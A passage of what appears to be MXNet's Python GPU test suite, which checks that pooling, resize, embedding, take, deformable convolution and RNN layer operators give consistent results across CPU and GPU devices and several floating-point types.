pool_type=pool_type, pooling_convention=convention, global_pool=False, name='pool')) check_consistency(sym_list, ctx_list) test_pooling_full_2d_type('max') test_pooling_full_2d_type('avg') test_pooling_full_2d_type('sum') @with_seed() @pytest.mark.serial def test_flatten_slice_after_conv(): ctx_list = [] data = mx.sym.Variable('conv_data') conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1)) flatten = mx.symbol.flatten(data=conv) slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1) ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}] check_consistency(slice_sym, ctx_list, scale=0.5) @with_seed() def test_bilinear_resize_op(): ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}, {'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}] data = mx.sym.Variable('data') sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=True) check_consistency(sym, ctx_list) sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=False) check_consistency(sym, ctx_list) sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=True) check_consistency(sym, ctx_list) sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=False) check_consistency(sym, ctx_list) sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=True) check_consistency(sym, ctx_list) sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=False) check_consistency(sym, ctx_list) @with_seed() @pytest.mark.serial def test_global_pooling(): def test_1d_pooling(pool_type, p_value=2): data = (2, 3, 20) kernel = (4,) pad = (2,) stride = (2,) ctx_list = [] sym_list = [] pooling_convention = 'valid' ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value)) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value)) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value)) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) check_consistency(sym_list, ctx_list) def test_2d_pooling(pool_type, p_value=2): data = (2, 3, 20, 20) kernel = (4, 4) pad = (2, 2) stride = (2, 2) ctx_list = [] sym_list = [] pooling_convention = 'valid' if pool_type != 'lp': ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) check_consistency(sym_list, ctx_list) test_1d_pooling('max') test_1d_pooling('avg') test_1d_pooling('sum') test_1d_pooling('lp', p_value=1) test_1d_pooling('lp', p_value=2) test_1d_pooling('lp', p_value=3) test_2d_pooling('max') test_2d_pooling('avg') test_2d_pooling('sum') test_2d_pooling('lp', p_value=1) test_2d_pooling('lp', p_value=2) test_2d_pooling('lp', p_value=3) @with_seed() def test_upsampling_with_type(): sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1) ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}}, {'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}, {'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}}, {'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}}, {'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_upsampling_bilinear_with_type(): sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1) ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}}, {'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}, {'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}}, {'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}}, {'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_concat_with_type(): sym = mx.sym.Concat(name='concat', num_args=2) ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}}, {'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}, {'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}}, {'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}}, {'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_elementwisesum_with_type(): dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]], [mx.cpu(0), [np.float64, np.float32]] ] for num_args in range(1, 6): ews_arg_shape = {} for i in range(num_args): ews_arg_shape['ews_arg'+str(i)] = (2, 10) sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args) ctx_list = [] for dev, types in dev_types: for dtype in types: ews_arg_dtype = {'type_dict':{}} for i in range(num_args): ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype ctx_elem = {'ctx': dev} ctx_elem.update(ews_arg_shape) ctx_elem.update(ews_arg_dtype) ctx_list.append(ctx_elem) check_consistency(sym, ctx_list) @with_seed() def test_reshape_with_type(): sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0)) ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}}, {'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}, {'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}}, {'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}}, {'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_blockgrad_with_type(): sym = mx.sym.BlockGrad(name='bg') ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}}, {'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}, {'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}}, {'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}}, {'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_swapaxis_with_type(): sym = mx.sym.SwapAxis(name='swap', dim1=1) ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}}, {'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}, {'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}}, {'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}}, {'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_fullyconnected_with_type(): sym = mx.sym.FullyConnected(num_hidden=3, name='inner') ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}}, {'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}, {'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}}, {'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}}, {'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}] check_consistency(sym, ctx_list) # Sizes are divisible by 8 to test TensorCore on Volta GPU. sym = mx.sym.FullyConnected(num_hidden=8, name='inner') ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}}, {'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_activation_with_type(): act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign'] shape = (2, 2, 10, 10) for act_type in act_types: sym = mx.sym.Activation(name='act', act_type=act_type) ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}}, {'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}}, {'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}, {'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}}, {'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}}, {'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}] check_consistency(sym, ctx_list) @with_seed() def test_lrn(): sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn') ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}, {'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() @pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine', reason="Testing with naive engine consistently triggers illegal memory access. Tracked in #17713") def test_embedding_with_type(): def test_embedding_helper(data_types, weight_types, low_pad, high_pad): NVD = [[20, 10, 20], [200, 10, 300], [10000, 4, 20]] for safe_accumulation in ['0', '1', None]: for N, V, D in NVD: with environment('MXNET_SAFE_ACCUMULATION', safe_accumulation): if N > 1000 and safe_accumulation != '1': break sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D) ctx_list = [] for data_type in data_types: for weight_type in weight_types: ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,), 'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}}) ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,), 'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}}) arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))} check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'}, arg_params=arg_params, scale=0.1) data_types = [np.float16, np.float32, np.float64, np.int32] weight_types = [np.float16, np.float32, np.float64] test_embedding_helper(data_types, weight_types, 5, 5) data_types = [np.uint8] weight_types = [np.float16, np.float32, np.float64] test_embedding_helper(data_types, weight_types, 0, 5) @with_seed() def test_take_with_type(): sym = mx.sym.take(name='take') for safe_accumulation in ['0', '1', None]: for data_ndim in range(2, 5): for idx_ndim in range(1, 4): data_shape = () for _ in range(data_ndim): data_shape += (np.random.randint(low=3, high=6), ) idx_shape = () for _ in range(idx_ndim): idx_shape += (np.random.randint(low=3, high=5), ) ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float64, 'take_a': np.float64}}, {'ctx': mx.gpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float32, 'take_a': np.float32}}, {'ctx': mx.gpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float16, 'take_a': np.float16}}, {'ctx': mx.cpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float64, 'take_a': np.float64}}, {'ctx': mx.cpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float32, 'take_a': np.float32}}, {'ctx': mx.cpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float16, 'take_a': np.float16}}] arg_params = {'take_indices': np.random.randint(low=0, high=data_shape[0], size=idx_shape), 'take_a': np.random.normal(size=data_shape)} with environment('MXNET_SAFE_ACCUMULATION', safe_accumulation): check_consistency(sym, ctx_list, grad_req={'take_indices': 'null', 'take_a': 'write'}, arg_params=arg_params) # check a large num of indices: may underflow calculating gradient in FP16, # if MXNET_SAFE_ACCUMULATION is not activated with environment('MXNET_SAFE_ACCUMULATION', '1'): data_size = 4 indices_size = 10000 out_dim = 20 data_types = [np.float16, np.float32, np.float64] indices_types = [np.float16, np.float32, np.float64, np.int32] # axis 0 sym = mx.sym.take(name='take', axis=0) ctx_list = [] for data_type in data_types: for index_type in indices_types: ctx_list.append({'ctx': mx.cpu(0), 'take_indices': (indices_size,), 'take_a': (data_size, out_dim), 'type_dict': {'take_indices': index_type, 'take_a': data_type}}) ctx_list.append({'ctx': mx.gpu(0), 'take_indices': (indices_size,), 'take_a': (data_size, out_dim), 'type_dict': {'take_indices': index_type, 'take_a': data_type}}) arg_params = {'take_indices': np.random.randint(0, data_size, size=(indices_size,)), 'take_a': np.random.normal(size=(data_size, out_dim))} check_consistency(sym, ctx_list, grad_req={'take_indices': 'null','take_a': 'write'}, arg_params=arg_params) # axis 1 sym = mx.sym.take(name='take', axis=1) ctx_list = [] for data_type in data_types: for index_type in indices_types: ctx_list.append({'ctx': mx.cpu(0), 'take_indices': (indices_size,), 'take_a': (data_size, out_dim), 'type_dict': {'take_indices': index_type, 'take_a': data_type}}) ctx_list.append({'ctx': mx.gpu(0), 'take_indices': (indices_size,), 'take_a': (data_size, out_dim), 'type_dict': {'take_indices': index_type, 'take_a': data_type}}) arg_params = {'take_indices': np.random.randint(0, data_size, size=(indices_size,)), 'take_a': np.random.normal(size=(data_size, out_dim))} check_consistency(sym, ctx_list, grad_req={'take_indices': 'null','take_a': 'write'}, arg_params=arg_params) @with_seed() @pytest.mark.serial def test_psroipooling_with_type(): arg_params = { 'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])} # plain psroipooling sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool') ctx_list = [{'ctx': mx.gpu(0), 'psroipool_data': (1, 18, 14, 14), 'psroipool_rois': (2, 5), 'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}}, {'ctx': mx.gpu(0), 'psroipool_data': (1, 18, 14, 14), 'psroipool_rois': (2, 5), 'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}}, {'ctx': mx.gpu(0), 'psroipool_data': (1, 18, 14, 14), 'psroipool_rois': (2, 5), 'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}}, ] check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write', 'psroipool_rois': 'null'}, arg_params=arg_params) @with_seed() @pytest.mark.serial def test_deformable_psroipooling_with_type(): tol = {np.dtype(np.float32): 1e-1, np.dtype(np.float64): 1e-3, np.dtype(np.float16): 1e-2} arg_params = { 'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])} # deformable psroipooling sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3, output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool') ctx_list = [{'ctx': mx.gpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64, 'deformable_psroipool_trans': np.float64}}, {'ctx': mx.gpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32, 'deformable_psroipool_trans': np.float32}}, {'ctx': mx.gpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16, 'deformable_psroipool_trans': np.float16}}, {'ctx': mx.cpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64, 'deformable_psroipool_trans': np.float64}}, {'ctx': mx.cpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32, 'deformable_psroipool_trans': np.float32}}, {'ctx': mx.cpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16, 'deformable_psroipool_trans': np.float16}}, ] check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol, grad_req={'deformable_psroipool_data': 'write', 'deformable_psroipool_rois': 'null', 'deformable_psroipool_trans': 'write'}, arg_params=arg_params) @with_seed() @pytest.mark.serial def test_deformable_convolution_with_type(): tol = {np.dtype(np.float32): 1e-1, np.dtype(np.float64): 1e-3} sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv') # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 10, 10), 'deformable_conv_offset': (2, 18, 8, 8), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 10, 10), 'deformable_conv_offset': (2, 18, 8, 8), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 10, 10), 'deformable_conv_offset': (2, 18, 8, 8), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 10, 10), 'deformable_conv_offset': (2, 18, 8, 8), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, ] check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol) # test ability to turn off training on bias check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol, grad_req={'deformable_conv_data': 'write', 'deformable_conv_offset': 'write', 'deformable_conv_weight': 'write', 'deformable_conv_bias': 'null'}) @with_seed() def test_deformable_convolution_options(): tol = {np.dtype(np.float32): 1e-1, np.dtype(np.float64): 1e-3} # 2D convolution # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here # Pad > 0 ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 7, 7), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 7, 7), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 7, 7), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 7, 7), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, ] sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv') check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol) # Stride > 1 ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, ] sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv') check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol) # Dilate > 1 ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, ] sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv') check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol) # Deformable group > 1 ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 36, 5, 5), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 36, 5, 5), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 36, 5, 5), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 36, 5, 5), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, ] sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv') check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol) def check_rnn_layer(layer): layer.initialize(ctx=[mx.cpu(0), mx.gpu(0)]) with mx.gpu(0): x = mx.nd.ones((10, 16, 30)) states = layer.begin_state(16) go, gs = layer(x, states) with mx.cpu(0): x = mx.nd.ones((10, 16, 30)) states = layer.begin_state(16) co, cs = layer(x, states) # atol of 1e-6 required, as exposed by seed 2124685726 assert_almost_equal(go, co, rtol=1e-2, atol=1e-6) for g, c in zip(gs, cs): assert_almost_equal(g, c, rtol=1e-2, atol=1e-6) def check_rnn_layer_w_rand_inputs(layer): layer.initialize(ctx=[mx.cpu(0), mx.gpu(0)]) x = mx.nd.uniform(shape=(10, 16, 30)) with mx.gpu(0): x = x.copyto(mx.gpu(0)) states = layer.begin_state(16) go, gs = layer(x, states) with 